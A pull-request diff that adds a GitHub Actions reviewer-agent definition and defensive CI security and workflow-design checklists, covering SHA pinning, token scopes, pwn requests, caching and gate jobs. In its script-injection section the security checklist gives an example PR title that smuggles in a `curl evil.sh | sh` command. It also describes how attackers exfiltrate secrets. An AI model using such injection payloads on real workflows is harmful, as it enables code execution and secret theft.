### PR TITLE
chore(agents): add tauri-build-expert and github-actions-expert

### DIFF
--- a/.claude/agents/README.md
+++ b/.claude/agents/README.md
@@ -138,6 +138,12 @@ Canonical tags introduced by the current agent set:
 | `mocks` | test mock contracts and hygiene |
 | `anchoring` | comment / annotation anchoring |
 | `async-errors` | async error handling, silent failures |
+| `build-system` | Tauri bundle config, hooks, externalBin, capability ACL at build time |
+| `signing` | per-platform code signing, notarization, signature verification |
+| `updater` | Tauri updater pubkey, manifest, signed artifacts, install modes |
+| `gha` | GitHub Actions workflow shape — triggers, concurrency, matrix, gates |
+| `cicd` | CI/CD pipeline correctness independent of provider |
+| `secrets` | secret handling, redaction, env-var indirection |
 
 When adding a new tag, update this table and any agent's `knowledge_tags`
 that should now match.
@@ -169,8 +175,10 @@ only. The agent file itself NEVER needs editing for portability.
 | `performance-expert` | ✅ | performance, hot-paths, react-rerender, react-rendering, js-performance, tauri-v2, bundle | performance | regressions vs numeric budgets |
 | `product-expert` | ✅ | product, accessibility, macos, ux-banners | charter, features | UX, scope, pillar progress |
 | `react-coding-expert` | ✅ | react-19, react-composition, react-hooks, state-management, react-rerender, react-rendering | design-patterns | idiomatic React 19 |
+| `tauri-build-expert` | ✅ | build-system, signing, updater, bundle, tauri-v2 | architecture, security, features | catch defects in the build/distribute path — bundle config, signing, updater, sidecar, Cargo profile |
 | `tauri-coding-expert` | ✅ | tauri-v2, ipc, events, macos, windows | design-patterns | idiomatic Tauri v2 |
 | `tauri-security-expert` | ✅ | security, ipc, tauri-v2 | security | concrete attack vectors in Tauri IPC + FS surface |
+| `github-actions-expert` | ✅ | gha, cicd, security, secrets | features | catch defects in GHA workflows — security, concurrency, caching, gate jobs |
 | `test-expert` | — | test, ipc, mocks | test-strategy | test completeness, oracle quality, mock hygiene |
 | `exe-goal-assessor` | — | (none) | (project-specific) | autonomous-loop satisfaction check |
 | `exe-implementation-validator` | — | (none) | (project-specific) | run-and-report validation gate |

--- a/.claude/agents/github-actions-expert/agent.md
+++ b/.claude/agents/github-actions-expert/agent.md
@@ -1,0 +1,57 @@
+---
+name: github-actions-expert
+description: Reviews GitHub Actions workflows — security hardening, GITHUB_TOKEN scopes, third-party action pinning, secrets handling, concurrency, caching, matrix strategy, and OIDC-based cloud auth.
+knowledge_tags: [gha, cicd, security, secrets]
+project_docs: [features]
+---
+
+**Goal:** catch defects in CI/CD workflows — exploitable triggers (`pull_request_target` + checkout), unpinned third-party actions, over-privileged `GITHUB_TOKEN`, leaked secrets, broken concurrency groups, ineffective caches, missing aggregate gate jobs that branch protection depends on.
+
+This agent is **separate from** `tauri-build-expert`. The build expert reviews what a *correct* build needs from CI; this agent reviews how the workflow delivers it.
+
+**Protocol:** dispatch one subagent per knowledge file below; each gets ONLY that file + the diff and cites rules from it; you aggregate, dedupe overlaps, surface cross-doc patterns. Always dispatch (uniform). No recursion.
+
+## Knowledge sources
+
+**Generic, bundled with the agent (always loaded):**
+
+- [`./knowledge/gha-security-hardening.md`](knowledge/gha-security-hardening.md) — `sec-*`, `oidc-*`, `secrets-*` rule families (SHA pinning, GITHUB_TOKEN least privilege, script injection, `pull_request_target`, OIDC trust).
+- [`./knowledge/gha-workflow-design.md`](knowledge/gha-workflow-design.md) — `wf-*`, `cache-*`, `gate-*` rule families (concurrency, caching, matrix, paths, timeouts, artifact retention, aggregate gate jobs for branch protection).
+
+**Project-specific deep-dives (optional, declared via category):**
+
+This agent's frontmatter lists `project_docs: [features]`. At review time, look up the category in the host repo's `AGENTS.md` under the **Agent project-doc manifest** section. If `features` maps to a folder, load every `*.md` inside — installation, updates, release-channel docs are the ones most likely to constrain the workflow's output. If `AGENTS.md` is absent, the manifest section is missing, the category is unmapped, or no folder/file matches, skip silently.
+
+**Project-specific tagged knowledge (optional, tag-filtered):**
+
+If the host repo has a `docs/best-practices-project/` directory, scan every `*.md` file there. Load any whose `tags` overlap this agent's `knowledge_tags`. If absent, skip silently.
+
+**Always check:**
+
+- Every `uses:` reference to a third-party action is pinned to a **full-length commit SHA**, not a tag/branch — and `actions/*`, `github/*`, and the few "verified creator" actions that the host repo accepts are documented as the allowlist.
+- Workflow-level or job-level `permissions:` block exists and grants the minimum scopes the job uses. Workflows that omit `permissions:` inherit the org default (often `contents: write`), which is over-privileged for almost every job.
+- No workflow uses `pull_request_target` together with `actions/checkout` of the PR head SHA. This combination is the canonical "pwn request" attack — it grants write access + secrets to attacker-controlled code.
+- Untrusted input (`github.event.*` from a PR) is never interpolated directly into a `run:` script. Use `env:` to indirect.
+- `GITHUB_TOKEN` is preferred over PATs / GitHub App tokens unless a cross-repo or recursive-trigger requirement explicitly needs the latter. Recursion (a workflow run triggers another workflow run) requires a non-`GITHUB_TOKEN`.
+- `concurrency:` group is defined for any workflow that may overlap on the same ref — typically `group: ${{ github.workflow }}-${{ github.ref }}` with `cancel-in-progress: true` for PR validation. Production deploy workflows should NOT use `cancel-in-progress: true`.
+- Caches keyed correctly (lock-file hash + OS + tool version) and scoped per-branch where appropriate. Caches with overly-broad keys silently ship stale dependencies; caches with overly-narrow keys never hit.
+- An aggregate "gate" job (e.g. `Test (Linux)` that depends on every parallel test job with `if: always()`) exists when branch protection requires a single status check name.
+- Job timeouts (`timeout-minutes:`) are set on every job. Default is 360 minutes (6 hours) — almost never the right value.
+- Artifacts uploaded with explicit `retention-days:` (default is 90 — too long for noisy reports).
+
+**Out of scope (handoff):**
+
+- Tauri build configuration (bundle, signing, updater) → `tauri-build-expert`. This agent flags how the workflow *runs* `tauri build`; the build expert flags what `tauri build` needs to be configured to do.
+- Application code reviewed by the workflow → the relevant code-area expert (React, Tauri, security, etc.).
+- Test-suite design / coverage / mock hygiene → `test-expert`.
+- Documentation drift between workflow comments and `docs/` → `documentation-expert`.
+
+**Output:**
+
+```
+## CI/CD review
+### Critical / High / Medium / Low
+- [file:line] finding — violates rule N in <doc-or-knowledge-file> — fix: <one line>
+### Already sound
+- <specific workflow pattern held in code, with citation>
+```

--- a/.claude/agents/github-actions-expert/knowledge/gha-security-hardening.md
+++ b/.claude/agents/github-actions-expert/knowledge/gha-security-hardening.md
@@ -1,0 +1,245 @@
+---
+tags: [gha, cicd, security, secrets]
+source: GitHub Actions official documentation (https://docs.github.com/en/actions/) and GitHub Security Lab research, summarised
+---
+
+# GitHub Actions Security Hardening
+
+Project-agnostic audit checklist for GitHub Actions workflows. Every rule below maps to a documented attack vector or hardening guideline from GitHub's security guides. Cite a rule by its `<rule-id>`.
+
+> **Scope:** workflow security — third-party action provenance, `GITHUB_TOKEN` permissions, secret handling, script injection, malicious-PR mitigations, OIDC cloud auth, fork-PR posture. Workflow correctness (concurrency, caching, matrix, gating) lives in `gha-workflow-design.md`.
+>
+> **References:** [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions), [Using secrets in GitHub Actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/using-secrets-in-github-actions), [Automatic token authentication](https://docs.github.com/en/actions/security-for-github-actions/security-guides/automatic-token-authentication), [About OIDC](https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/about-security-hardening-with-openid-connect), [GHSL: Preventing pwn requests](https://securitylab.github.com/resources/github-actions-preventing-pwn-requests/).
+
+## Third-party action provenance — `sec-pin-*`
+
+### `sec-pin-full-sha`
+
+Every third-party action MUST be pinned to a **full-length commit SHA**, not a tag or branch. Tags can be retroactively moved by the action's maintainer (or by an attacker who gains write access to the action repo); a SHA cannot. Canonical form:
+
+```yaml
+uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v4.1.1
+```
+
+The `# v4.1.1` comment is mandatory documentation but has no semantic effect — Dependabot uses it to detect upgrades. A bare tag (`uses: actions/checkout@v4`) is acceptable **only** for first-party `actions/*`, `github/*`, and explicitly-trusted "Verified creator" actions where the maintainer enforces the SHA-pinning policy on their side. Document the allowlist in the workflow.
+
+### `sec-pin-no-branch-refs`
+
+`uses: some/action@main` is **never** acceptable — `main` moves on every commit, and a compromised branch ships exploit code into every CI run that uses it. Even for first-party actions, prefer tagged releases over branch refs.
+
+### `sec-pin-organisation-policy`
+
+GitHub offers org-level and repo-level policy controls to *require* SHA pinning across all workflows (`Settings → Actions → General → Allow actions and reusable workflows`). Recommend enabling this when the host repo has more than a handful of workflows — it makes drift detectable at PR time instead of audit time.
+
+### `sec-pin-dependabot-coverage`
+
+Configure Dependabot for `package-ecosystem: "github-actions"` so SHA-pinned actions get version-update PRs. A pinned-but-stale action is its own risk (CVEs in the action itself); Dependabot closes that gap.
+
+## `GITHUB_TOKEN` least privilege — `sec-token-*`
+
+### `sec-token-default-read-only`
+
+The default `GITHUB_TOKEN` permissions are inherited from the repo/org settings. Set the *workflow-level* default to read-only and grant write scopes per-job:
+
+```yaml
+permissions:
+  contents: read
+
+jobs:
+  release:
+    permissions:
+      contents: write
+      packages: write
+```
+
+Workflows that omit a top-level `permissions:` block inherit potentially-broad org defaults. Audit every workflow file — a missing `permissions:` is a finding.
+
+### `sec-token-scope-narrow-per-job`
+
+Per-job `permissions:` should grant the **minimum** scopes the job actually uses. Common patterns:
+
+- A test/lint job: `contents: read` only.
+- A job that creates issues / comments on PRs: `issues: write` and/or `pull-requests: write`.
+- A job that publishes a release: `contents: write`.
+- A job that pushes to GHCR: `packages: write`.
+- A job that comments on PRs from the *same* repo (not forks): `pull-requests: write`.
+
+Granting `contents: write` to a test job is a finding — a compromised test step can rewrite the repo.
+
+### `sec-token-no-write-on-fork-pr`
+
+`pull_request` events from a fork get a **read-only** `GITHUB_TOKEN` regardless of the workflow's `permissions:` block. Workflows that need to comment on fork PRs must use `workflow_run` (post-merge of test results) or accept that the comment step will silently no-op on forks. Do **not** work around this with a PAT — see `sec-pwn-no-pull-request-target`.
+
+### `sec-token-not-for-recursive-triggers`
+
+Events triggered by `GITHUB_TOKEN` actions do **not** spawn new workflow runs (with the exception of `workflow_dispatch` and `repository_dispatch`). A workflow that pushes a commit using `GITHUB_TOKEN` will not re-trigger CI on that commit. If recursion is required (e.g. a release tag should trigger the release workflow), use a GitHub App installation token or PAT — and mark the use case in a comment.
+
+## Script injection — `sec-inject-*`
+
+### `sec-inject-no-direct-interpolation`
+
+Untrusted GitHub event data (`github.event.pull_request.title`, `github.event.issue.body`, `github.event.head_commit.message`, etc.) MUST NOT be interpolated directly into a `run:` script. The expansion happens before bash sees the script, so attacker-controlled input becomes attacker-controlled bash:
+
+```yaml
+# BROKEN — script injection
+run: echo "PR title: ${{ github.event.pull_request.title }}"
+
+# CORRECT — env indirection
+env:
+  PR_TITLE: ${{ github.event.pull_request.title }}
+run: echo "PR title: $PR_TITLE"
+```
+
+The env-var indirection works because the value is passed as a string to bash, not concatenated into the source. A malicious title `a"; curl evil.sh | sh; echo "` becomes harmless under env indirection.
+
+### `sec-inject-untrusted-fields`
+
+The fields most often used as injection vectors:
+
+- `github.event.pull_request.title`, `.body`, `.head.ref`, `.head.label`
+- `github.event.issue.title`, `.body`
+- `github.event.head_commit.message`, `.author.email`, `.author.name`
+- `github.event.commits[*].message`
+- `github.event.review.body`
+- `github.event.comment.body`
+- `github.event.discussion.title`, `.body`
+- `github.head_ref`, `github.event.workflow_run.head_branch`
+
+Any of these in a `run:` block without env indirection is a finding.
+
+### `sec-inject-prefer-actions-over-shell`
+
+A custom JavaScript/composite action that takes the value as an `inputs:` parameter is structurally safer than an inline shell script — the value reaches the action as a function argument, never as a shell concatenation. Recommend converting injection-prone shell logic into a small composite action.
+
+### `sec-inject-shellcheck-double-quote`
+
+Even with env indirection, follow standard shell hygiene: `"$VAR"` (quoted) instead of `$VAR` (unquoted, prone to word-splitting). This is not GHA-specific but it interacts: a value that comes from `${{ ... }}` and gets word-split can recombine with an attacker-influenced second variable into an injection.
+
+## Pull-request triggers — `sec-pwn-*`
+
+### `sec-pwn-no-pull-request-target-with-checkout`
+
+The `pull_request_target` trigger runs in the context of the **target** (base) repo, with **write** permissions and **secret** access. It is the right primitive for labelling, commenting, or running trusted post-merge logic. It is **the wrong primitive** for building/testing PR code.
+
+The "pwn request" pattern combines `pull_request_target` with `actions/checkout` of the PR head SHA — that grants attacker-controlled code (the PR diff) write access and secrets access to the target repo. Examples of how this is exploited:
+
+- The PR adds a malicious `package.json` `preinstall` script; `npm install` runs it with secrets in the env.
+- The PR modifies the test runner config to exfiltrate `secrets.*` to an attacker server.
+- The PR adds a custom `Makefile` target that the workflow invokes.
+
+CodeQL has a rule for this pattern. The fix:
+
+- Use `pull_request` (not `pull_request_target`) for any workflow that builds/tests PR code. This gives a read-only `GITHUB_TOKEN` and no access to secrets.
+- Use `pull_request_target` only for jobs that do not check out the PR head — e.g. labelling based on the title, or commenting based on file paths.
+- For "build PR + comment results" workflows, split into two: a `pull_request` job that builds and uploads an artifact, and a `workflow_run` job that reads the artifact and comments.
+
+### `sec-pwn-no-secrets-in-pull-request-build`
+
+Even on `pull_request` (not `_target`), do not pass secrets into a job that builds untrusted PR code:
+
+```yaml
+# BROKEN — secret leaks into attacker code
+on: pull_request
+jobs:
+  build:
+    steps:
+      - run: ./build.sh
+        env:
+          DEPLOY_KEY: ${{ secrets.DEPLOY_KEY }}
+```
+
+The PR's `./build.sh` can `echo "$DEPLOY_KEY"` to its own stdout (or to a curl request). Move secret-using steps to a `workflow_run` or `push` job triggered after merge.
+
+### `sec-pwn-validate-dispatch-input`
+
+`workflow_dispatch` inputs that select a ref to validate (common in iterate/release loops) MUST be validated server-side before `actions/checkout`. A `validate-dispatch` pre-flight job that fails fast (~5 s) when the input doesn't match an allowlist of branch prefixes prevents accidental validation of `main` or attacker-supplied refs.
+
+### `sec-pwn-fork-tests-isolated`
+
+Fork PRs have inherent risks even under `pull_request`. Mitigations:
+
+- Require approval from a trusted reviewer before any workflow runs (`Settings → Actions → General → Fork pull request workflows`).
+- Use `environment:` with required reviewers for any job that needs secrets.
+- Run forked test jobs in a hardened container (no host filesystem, no privileged mounts).
+
+## Secrets — `secrets-*`
+
+### `secrets-never-structured`
+
+Never store JSON, XML, YAML, or any structured blob as a single secret. The log redactor matches secrets by exact string — a JSON blob with whitespace variations (or one re-emitted by an action) won't match its registered form, and the secret will appear in logs unredacted. Split structured secrets into individual values.
+
+### `secrets-add-mask-derived-values`
+
+When a secret is transformed (base64-decoded, JWT-signed, hash of secret, etc.), the new value is **not** automatically redacted. Register it explicitly with `::add-mask::VALUE` (via the `core.setSecret` helper or a `run:` step that echoes the directive). Forgetting this step leaks the derived value when it appears in subsequent logs.
+
+### `secrets-environment-required-reviewers`
+
+For deployment / release secrets, scope them to a GitHub Environment with **required reviewers** rather than to the repo. Required reviewers gate access — a malicious PR can't trigger a deploy workflow that consumes the environment's secrets without approval. Use this for production-signing keys, deploy tokens, API keys with billing impact.
+
+### `secrets-rotate-on-suspected-leak`
+
+If a secret appears unredacted in any log, the secret is **compromised**. Steps in order:
+
+1. Delete the run logs (`gh run delete <run-id>`).
+2. Rotate the secret at its source (issuer, cloud provider, etc.).
+3. Update the GitHub secret with the new value.
+4. Audit downstream systems for unauthorized use during the leak window.
+
+A secret leak that is "logged but not used by an attacker" is still a leak — rotate.
+
+### `secrets-not-from-fork-context`
+
+Repository secrets are NOT exposed to workflows triggered by a fork PR via `pull_request`. They ARE exposed via `pull_request_target` — which is the entire point of the trigger. Combined with `sec-pwn-no-pull-request-target-with-checkout`, this means any `pull_request_target` workflow has secrets and must not check out untrusted code.
+
+### `secrets-no-plaintext-in-conf`
+
+Never commit a real secret value into `tauri.conf.json`, `package.json`, source code, or any committed file. Any value that should not be in the public history is a secret — including signing thumbprints (audit log artefact) and updater pubkey hashes (rotate-resistance).
+
+## OpenID Connect — `oidc-*`
+
+### `oidc-prefer-over-static-secrets`
+
+When a workflow needs cloud credentials (AWS, Azure, GCP, HashiCorp Vault), prefer OIDC token exchange over storing long-lived static secrets:
+
+```yaml
+permissions:
+  id-token: write   # required for OIDC
+  contents: read
+
+steps:
+  - uses: aws-actions/configure-aws-credentials@<sha>  # v4
+    with:
+      role-to-assume: arn:aws:iam::123456789012:role/my-role
+      aws-region: us-east-1
+```
+
+Benefits:
+- No long-lived cloud creds in GitHub secrets.
+- Per-job tokens that expire when the job ends.
+- Cloud-side trust scoped to repo/branch/environment via the OIDC `sub` claim.
+
+### `oidc-id-token-write-permission`
+
+OIDC requires `permissions.id-token: write` on the job. Without it, `getIDToken()` returns 403. Don't grant `id-token: write` workflow-wide — scope it to the job that needs it.
+
+### `oidc-trust-scope-narrow`
+
+The OIDC `sub` claim contains repo, branch, and (optionally) environment data. Configure the cloud-side trust to require the most specific match — e.g. `repo:org/repo:ref:refs/heads/main` rather than `repo:org/repo:*`. A wildcard trust lets any branch (or a branch a malicious PR creates) assume the role.
+
+### `oidc-environment-binds-trust`
+
+Use GitHub Environments to bind OIDC trust to a deployment context (`environment: production` in the workflow → cloud trust matches `repo:org/repo:environment:production`). This composes with the environment's required-reviewers gate to require human approval before any production credential is issued.
+
+## CodeQL & policy — `sec-policy-*`
+
+### `sec-policy-codeql-actions-enabled`
+
+Enable CodeQL for GitHub Actions in the host repo's security settings — it identifies the patterns codified above (script injection, `pull_request_target` misuse, missing `permissions:`) and surfaces them as code-scanning alerts. This is a defence-in-depth on top of manual review.
+
+### `sec-policy-codeowners-on-workflows`
+
+Add `.github/workflows/` to `CODEOWNERS` so workflow changes require review from a designated owner. A workflow change is high-blast-radius — it touches CI, secrets, and deployment all at once.
+
+### `sec-policy-no-self-hosted-on-public-repo`
+
+Do not run untrusted code on self-hosted runners attached to a public repo. Self-hosted runners persist between jobs (filesystem, network, environment) — a fork PR's job can leave a backdoor for the next job. Use ephemeral, GitHub-hosted runners for any public-repo CI; reserve self-hosted for trusted internal repos.

--- a/.claude/agents/github-actions-expert/knowledge/gha-workflow-design.md
+++ b/.claude/agents/github-actions-expert/knowledge/gha-workflow-design.md
@@ -1,0 +1,337 @@
+---
+tags: [gha, cicd]
+source: GitHub Actions official documentation (https://docs.github.com/en/actions/), summarised
+---
+
+# GitHub Actions Workflow Design
+
+Project-agnostic audit checklist for workflow correctness, performance, and reliability. Cite a rule by its `<rule-id>`.
+
+> **Scope:** workflow shape — triggers (`on:`), filters (`paths`/`branches`), concurrency, caching, matrix strategy, timeouts, artifact retention, gate jobs that satisfy branch protection. Security hardening lives in `gha-security-hardening.md`.
+>
+> **References:** [Workflow syntax](https://docs.github.com/en/actions/writing-workflows/workflow-syntax-for-github-actions), [Triggering a workflow](https://docs.github.com/en/actions/writing-workflows/choosing-when-your-workflow-runs/triggering-a-workflow), [Events that trigger workflows](https://docs.github.com/en/actions/writing-workflows/choosing-when-your-workflow-runs/events-that-trigger-workflows), [Caching dependencies](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/caching-dependencies-to-speed-up-workflows), [Concurrency](https://docs.github.com/en/actions/using-jobs/using-concurrency).
+
+## Triggers — `wf-on-*`
+
+### `wf-on-explicit-branches`
+
+`on.push.branches` and `on.pull_request.branches` SHOULD be explicit. A workflow that triggers on every push to every branch (`on: push` with no filter) burns CI minutes on feature branches that never PR. Pin to `main` for push, and to `[main]` (or specific protected branches) for PRs.
+
+### `wf-on-paths-filter-cost-aware`
+
+`paths:` and `paths-ignore:` filter at the workflow level — a workflow that doesn't match any path on the triggering commit is **skipped entirely** (it doesn't even create a check run). Use this to avoid running the heavy build/test workflow on docs-only PRs:
+
+```yaml
+on:
+  pull_request:
+    paths:
+      - 'src/**'
+      - 'src-tauri/**'
+      - 'package.json'
+      - '.github/workflows/ci.yml'
+```
+
+Caveat: a workflow that branch protection requires *as a status check* must run on every PR even if it's a no-op — otherwise the PR is stuck in "pending" forever. For these workflows, use `paths-ignore:` and a no-op gate job (see `gate-aggregate-job`), not `paths:`.
+
+### `wf-on-paths-ignore-for-docs`
+
+`paths-ignore: ['docs/**', '*.md']` is the canonical pattern for skipping docs-only changes. **Important**: the filter is `paths-ignore: ALL files match these patterns → skip`, not `ANY file matches → skip`. A PR that touches both `docs/foo.md` and `src/bar.ts` triggers the workflow.
+
+### `wf-on-workflow-dispatch-typed-inputs`
+
+`workflow_dispatch.inputs` should declare `type:` and `required:`. Untyped inputs default to string and lose validation. For `boolean` and `choice`, use the dedicated types so the UI renders the right control.
+
+### `wf-on-pull-request-vs-target`
+
+`pull_request` (read-only token, no secrets for forks) is the right default. `pull_request_target` (write token, secrets) is for labelling/commenting workflows that DO NOT check out untrusted code. See `sec-pwn-no-pull-request-target-with-checkout` in the security knowledge file.
+
+### `wf-on-pull-request-types`
+
+`pull_request` defaults to `[opened, synchronize, reopened]`. If the workflow needs to re-run on `ready_for_review` (PR taken out of draft) or on label changes, list the types explicitly. Conversely, narrow to `[opened, synchronize]` when re-running on reopen is wasteful.
+
+## Concurrency — `wf-conc-*`
+
+### `wf-conc-cancel-in-progress-for-pr`
+
+For PR validation workflows, set `cancel-in-progress: true`:
+
+```yaml
+concurrency:
+  group: ${{ github.workflow }}-${{ github.ref }}
+  cancel-in-progress: true
+```
+
+When a developer pushes again to the same PR branch, the in-progress run cancels and a new one starts. This is the right trade-off for fast feedback.
+
+### `wf-conc-no-cancel-for-deploy`
+
+For production deploy workflows, set `cancel-in-progress: false` (or omit it — `false` is the default). Cancelling an in-progress deploy mid-way leaves the system in an indeterminate state. Pair with `concurrency.group: production-deploy` so a second deploy queues behind the first.
+
+### `wf-conc-group-includes-ref`
+
+The concurrency group MUST disambiguate by ref (or PR number) for PR-validation workflows. A group of just `${{ github.workflow }}` cancels other PRs' runs — flag this as a regression.
+
+### `wf-conc-named-group-for-resource`
+
+For workflows that contend over a real-world resource (a deploy slot, a Pages publish, a release-tag mutation), use a **named** static group (`group: production-deploy`, `group: pages`, `group: canary`) — not a ref-derived one. Multiple branches deploying to the same slot must serialise on the resource, not the branch.
+
+## Caching — `cache-*`
+
+### `cache-key-includes-os`
+
+A cache key MUST include the runner OS:
+
+```yaml
+key: ${{ runner.os }}-node-${{ hashFiles('package-lock.json') }}
+```
+
+A cross-OS cache hit (Linux cache restored on macOS) silently ships incompatible binaries (`node-gyp`-built native modules, Rust target-specific artefacts).
+
+### `cache-key-includes-lock-hash`
+
+Cache keys for dependency caches MUST include a hash of the lock file (`package-lock.json`, `yarn.lock`, `Cargo.lock`, `poetry.lock`, etc.). A stale cache for a changed lock file silently ships old dependencies — the new dependency in the lock file is downloaded but ignored.
+
+### `cache-restore-keys-fallback`
+
+Use `restore-keys:` for graceful fallbacks. Most-specific to least-specific:
+
+```yaml
+key:          ${{ runner.os }}-node-${{ hashFiles('package-lock.json') }}
+restore-keys: |
+  ${{ runner.os }}-node-
+  ${{ runner.os }}-
+```
+
+A partial cache hit is faster than a cold start; a full miss falls through to the most general key.
+
+### `cache-save-if-on-main-only-for-pr-cost`
+
+For Rust-build caches via `Swatinem/rust-cache@v2` (or a manual `actions/cache`), restrict cache *saves* to the main branch:
+
+```yaml
+- uses: Swatinem/rust-cache@v2
+  with:
+    workspaces: src-tauri
+    save-if: ${{ github.ref == 'refs/heads/main' }}
+```
+
+Reasoning: PR jobs **restore** from the main-branch cache, but each PR's tail-of-build artefacts would otherwise pack a separate cache, costing 2-3 minutes per PR for no benefit. Main-only saves keep the cache fresh for everyone.
+
+### `cache-prefix-key-distinct-features`
+
+When the same workspace builds with different feature flags (a `--features codegen` build vs production), use different `prefix-key`s on the cache. A shared cache silently corrupts when one build mode evicts the other's intermediates.
+
+### `cache-not-secrets-anywhere`
+
+Caches are world-readable to anyone who can run a workflow on the repo (including fork PRs against the base cache). **Never** put credentials, tokens, or PII into a cached path. Caches are not a secrets store.
+
+### `cache-version-on-system-deps`
+
+For caches that include system packages (`apt`, `brew`, `apk`), include an explicit `version:` parameter (e.g. `awalsh128/cache-apt-pkgs-action`'s `version: 1.0`). When the dependency list changes, bump the version to force a fresh cache. Without this, stale system caches silently ship old `libwebkit2gtk` / `libgtk` versions and the build mysteriously fails on the next runner upgrade.
+
+## Matrix strategy — `wf-matrix-*`
+
+### `wf-matrix-fail-fast-deliberate`
+
+`strategy.fail-fast` defaults to `true` — a failure in any matrix entry cancels the rest. Set `fail-fast: false` for cross-platform validation, where you want the full signal in one run (Linux failure + macOS failure + Windows failure) rather than discovering each on a separate retry. For matrices where one failure means the rest are pointless (e.g. testing N versions of one tool), keep `fail-fast: true`.
+
+### `wf-matrix-include-not-merge`
+
+Use `strategy.matrix.include` for sparse matrices, not the cartesian-product form with most cells excluded:
+
+```yaml
+# CORRECT — sparse matrix
+matrix:
+  include:
+    - { os: windows-latest, target: x86_64-pc-windows-msvc }
+    - { os: windows-latest, target: aarch64-pc-windows-msvc }
+    - { os: macos-latest,   target: aarch64-apple-darwin }
+
+# AVOID — dense matrix with excludes
+matrix:
+  os: [windows-latest, macos-latest, ubuntu-latest]
+  target: [x86_64-pc-windows-msvc, aarch64-pc-windows-msvc, aarch64-apple-darwin]
+  exclude:
+    - { os: ubuntu-latest, ... }
+    # ... 5 more excludes
+```
+
+The `include` form is easier to read, easier to grep, and harder to leave a stale combination in.
+
+### `wf-matrix-name-explicit`
+
+Each matrix entry MUST contribute a stable, human-readable identifier (typically a `name:` field). Use this in `runs-on:` selection, artifact names, and downstream job references — `${{ matrix.os }}` alone produces non-unique names when two entries share an OS.
+
+## Timeouts — `wf-timeout-*`
+
+### `wf-timeout-minutes-required`
+
+Every job MUST set `timeout-minutes:`. The default is 360 minutes (6 hours) — almost always wrong. Pick a value 2-3× the expected duration:
+
+- Lint/test jobs: 10-20 minutes.
+- Build jobs (Tauri release): 30-60 minutes.
+- Native E2E suites: 30-45 minutes.
+- Full release pipeline: 90 minutes.
+
+A hung step otherwise burns 6 hours of billing per failure. Surface this as a recommendation if missing.
+
+### `wf-timeout-step-level-for-flaky`
+
+For known-flaky steps (network-dependent installs, hdiutil/codesign on macOS), add a per-step `timeout-minutes:` shorter than the job timeout. The step fails fast and falls into a retry wrapper or surfaces a clear log line.
+
+## Artifacts — `wf-artifact-*`
+
+### `wf-artifact-retention-explicit`
+
+`actions/upload-artifact` defaults to 90-day retention. For Playwright reports, build logs, and other ephemeral outputs, set `retention-days: 7` (or 14 for release-gate runs). A 90-day default on every PR's debug artefacts piles up fast.
+
+### `wf-artifact-conditional-on-failure`
+
+Upload debug artefacts only on failure: `if: failure()`. Uploading on success doubles storage and clutters the run page. Production artefacts (release installers) are the exception — they upload unconditionally.
+
+### `wf-artifact-name-includes-matrix`
+
+Artifact names MUST be unique per matrix entry — `name: playwright-report-${{ matrix.name }}` is the canonical form. Without disambiguation, the second matrix entry's upload fails with "An artifact with this name has already been uploaded".
+
+### `wf-artifact-no-secrets-in-name`
+
+Never put a secret value into an artifact name (or path). Artifact names appear unredacted in the UI and the API.
+
+## Aggregate gate jobs — `gate-*`
+
+### `gate-aggregate-job`
+
+When branch protection requires a single status check name (e.g. `Test (Linux)`), but the actual testing is sharded across multiple parallel jobs, add a no-op aggregate job:
+
+```yaml
+test-gate:
+  name: Test (Linux)
+  if: always()
+  needs: [rust-test, vitest, e2e-browser, bindings-drift]
+  runs-on: ubuntu-latest
+  steps:
+    - name: Check test results
+      run: |
+        if [[ "${{ needs.rust-test.result }}" != "success" || \
+              "${{ needs.vitest.result }}" != "success" || \
+              "${{ needs.e2e-browser.result }}" != "success" || \
+              "${{ needs.bindings-drift.result }}" != "success" ]]; then
+          echo "::error::One or more test jobs failed"
+          exit 1
+        fi
+```
+
+Three properties that MUST hold:
+
+- `if: always()` — the gate runs even if a `needs:` job failed; otherwise a failed shard skips the gate, which leaves the protected branch's status check pending.
+- The shell check examines every `needs.<job>.result` — `success` is the only acceptable value (`skipped` is a finding when the upstream wasn't deliberately conditional).
+- The `name:` is the **exact** string branch protection requires.
+
+### `gate-paths-ignore-fallthrough`
+
+If the protected workflow uses `paths-ignore`, the gate job MUST still run on every PR. Achieve this with two workflows:
+
+- `ci.yml` with `paths-ignore` and the heavy jobs.
+- `ci-gate.yml` with no path filter and a no-op gate job that reports the same name.
+
+Or: keep one workflow, drop `paths-ignore`, and short-circuit each heavy job with a `paths-changed?` first step. The first form is simpler.
+
+### `gate-validate-dispatch-input`
+
+For `workflow_dispatch` workflows that accept a ref input, add a `validate-dispatch` job that runs first and fails fast (~5 s) if the input is empty, points to the default branch, or doesn't match an allowlist of branch prefixes. Every other job depends on `validate-dispatch` via `needs:` so a malformed dispatch fails before any expensive work runs.
+
+## Reusable workflows — `wf-reuse-*`
+
+### `wf-reuse-call-with-secrets-explicit`
+
+`workflow_call`-style reusable workflows do NOT inherit secrets automatically. The caller MUST pass them:
+
+```yaml
+jobs:
+  build:
+    uses: ./.github/workflows/build.yml
+    secrets:
+      TAURI_SIGNING_PRIVATE_KEY: ${{ secrets.TAURI_SIGNING_PRIVATE_KEY }}
+```
+
+A reusable workflow that references `secrets.X` without the caller passing `X` silently sees `X` as empty.
+
+### `wf-reuse-pin-by-sha-when-cross-repo`
+
+A reusable workflow loaded from another repo (`uses: org/repo/.github/workflows/x.yml@<ref>`) MUST be pinned to a SHA, same as a third-party action. A tag/branch ref is a supply-chain risk.
+
+## Runner selection — `wf-runner-*`
+
+### `wf-runner-latest-vs-pinned`
+
+`ubuntu-latest`, `windows-latest`, `macos-latest` are moving targets — they update on a 1-2 month cadence and occasionally break builds (toolchain bumps, removed system packages). For release-critical workflows, pin to a specific image version (`ubuntu-22.04`, `windows-2022`, `macos-13`) and bump deliberately. For PR validation, `*-latest` is acceptable — failures are caught before merge.
+
+### `wf-runner-os-matters-for-bundle`
+
+Some Tauri targets require a specific runner OS:
+- macOS DMG / `.app` bundles: `macos-latest` (`macos-12+` or Apple Silicon).
+- Windows MSI (WiX): `windows-latest` (WiX is Windows-only).
